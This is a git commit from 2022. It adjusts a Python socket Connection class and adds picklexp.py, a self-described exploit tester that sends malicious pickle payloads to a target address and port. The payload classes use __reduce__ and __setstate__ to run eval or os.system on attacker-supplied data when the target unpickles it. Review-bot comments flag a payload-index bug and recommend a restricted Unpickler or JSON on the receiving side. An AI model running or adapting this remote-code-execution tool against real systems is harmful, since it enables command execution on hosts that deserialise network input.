Add exploit tester!

Captain ALM 2022-12-10 12:54:21 +00:00
parent b28c9925b9
commit 96d9e430b2
Signed by: alfred
GPG Key ID: 4E4ADD02609997B1
2 changed files with 104 additions and 4 deletions


@ -100,14 +100,19 @@ class Connection:
threads = dict() threads = dict()
actives = dict() actives = dict()
def __init__(self, binder, translator, onconn, onrecv, onend): def __init__(self, binder, translator, onconn, onrecv, onend):
if binder != None:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind(binder) self.socket.bind(binder)
self.socket.listen(8) self.socket.listen(8)
else:
self.socket = None
self.translator = translator self.translator = translator
self.onconn = onconn self.onconn = onconn
self.onrecv = onrecv self.onrecv = onrecv
self.onend = onend self.onend = onend
def listener(self): def listener(self):
if self.socket == None:
return
while self.active: while self.active:
s, a = self.socket.accept() s, a = self.socket.accept()
ac = a[0] + ":" + str(a[1]) ac = a[0] + ":" + str(a[1])
@ -193,7 +198,7 @@ class Connection:
break break
time.sleep(0.0001) time.sleep(0.0001)
self.threads.clear() self.threads.clear()
self.socket.close() if self.socket != None: self.socket.close()
def addresses(self): def addresses(self):
if self.active: if self.active:
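Review bot: The new `None` guards in `__init__`, in `listener` and on the `self.socket.close()` line compare with `!=`/`==`, which dispatches to the operand's `__eq__`; identity tests are the idiomatic and more predictable form, e.g. `if binder is not None:` and `if self.socket is None: return`. The constructor also gains an undocumented mode: `binder=None` yields a connection with no listening socket and `listener()` then returns silently, so `__init__` would benefit from a docstring such as `"""binder: (host, port) to listen on, or None for an outbound-only connection."""`. `listener` continues past the first hunk and the function containing the close call starts before the second, so other uses of `self.socket` outside these hunks may need the same guard.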

95
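--- a/picklexp.py
+++ b/picklexp.py
@@ -0,0 +1,95 @@
+#BSD 3-Clause, (C) Alfred Manville 2022
+#Be RESPONSIBLE when using this!
+import networker as net
+import pickle
+import traceback
+import sys
+#Payloads:
+#State payloads only work if the Object is available at the target
+class StatePXP:
+def __init__(self, data):
+self.data = data
+def __getstate__(self):
+return self.data
+def __setstate__(self, state):
+self.data = state
+print(self.data)
+class ReducePXP:
+def __init__(self, data):
+self.data = data
+def __reduce__(self):
+return print, (self.data,)
+class StateEXP:
+def __init__(self, data):
+self.data = data
+def __getstate__(self):
+return self.data
+def __setstate__(self, state):
+self.data = state
+eval(self.data)
+class ReduceEXP:
+def __init__(self, data):
+self.data = data
+def __reduce__(self):
+return eval, (self.data,)
+class ReduceSXP:
+def __init__(self, data):
+self.data = data
+def __reduce__(self):
+import os
+return os.system, (self.data,)
+payloads = (StatePXP(""), ReducePXP(""), StateEXP(""), ReduceEXP(""), ReduceSXP(""))
+payload = None
+taddr = ""
+tport = 0
+plid = 0
+pldata = ""
+def onx(a):
+pass
+def ony(a, m):
+pass
+def main():
+conn = net.Connection(None, net.PickleTranslate(), onx, ony, onx)
+print("Running Exploit @ " + taddr + ":" + str(tport))
+print("Exploit: " + str(type(payload)) + " ; Data: " + pldata)
+try:
+conn.connect((taddr, tport))
+print("Exploiting...")
+conn.send(taddr+":"+str(tport), payload)
+print("Exploited!")
+except:
+print(traceback.format_exc())
+conn.close()
+exit
+if __name__ == "__main__":
+print("Python PicklExp (C) Alfred Manville 2022 BSD-3-Clause")
+if len(sys.argv) > 1:
+taddr = sys.argv[1]
+else:
+taddr = input("Enter the target address: ")
+if len(sys.argv) > 2:
+tport = int(sys.argv[2])
+else:
+tport = int(input("Enter the target port: "))
+if len(sys.argv) > 3:
+plid = int(sys.argv[3]) - 1
+else:
+plid = int(input("Enter the payload position " + str(payloads) + " : ")) - 1
+if len(sys.argv) > 4:
+pldata = sys.argv[4]
+else:
+pldata = input("Enter the payload data: ")
+payload = payloads[plid]
+payload.data = pldata
+main()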
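Review bot: The payload position read in the `__main__` block is used unchecked in `payloads[plid]`: after the `- 1` adjustment an entry of 0 becomes -1 and silently selects the last tuple element, the `os.system` payload, instead of failing, so a range check such as `if not 0 <= plid < len(payloads): sys.exit("payload position out of range")` belongs before the lookup. In `main()`, the bare `exit` on the last line is an expression with no effect and the bare `except:` also traps `KeyboardInterrupt`; `except Exception:` and dropping the `exit` line would be cleaner. Every payload class here relies on the receiving side unpickling bytes taken from the socket, so the durable fix is presumably in `net.PickleTranslate`, which is not shown in this commit: a restricted `pickle.Unpickler` whose `find_class` allows only the expected types, or a data-only format such as JSON.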